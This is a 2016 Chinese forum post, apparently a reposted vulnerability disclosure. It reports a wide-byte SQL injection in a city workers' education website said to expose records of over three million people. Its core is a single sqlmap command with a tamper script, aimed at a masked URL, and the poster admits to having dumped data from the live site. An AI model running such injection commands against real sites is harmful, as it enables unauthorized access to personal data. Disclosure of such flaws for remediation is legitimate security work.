HanDs
管理员

[7月漏洞公开] 某市职工教育网SQL注入涉及300多万人员信息 



详细说明:

注入点:http://**.**.**.**/news.do?id=5adbc18f2f2142b8af81e8a28a43fbe7&curCol=newsA_trends

宽字节注入:

sqlmap -u "http://**.**.**.**/news.do?id=5adbc18f2f2142b8af81e8a28a43fbe7&curCol=newsA_trends" --tamper=unmagicquotes.py --batch --random-agent

gdzgjy1.png



gzzgjy2.png



大量的数据:

gzzgjy3.png



昨天跑的,发现今天访问是403了。不知道审核能通过吗?

漏洞证明:

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
某市 职工 教育网 S QL
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复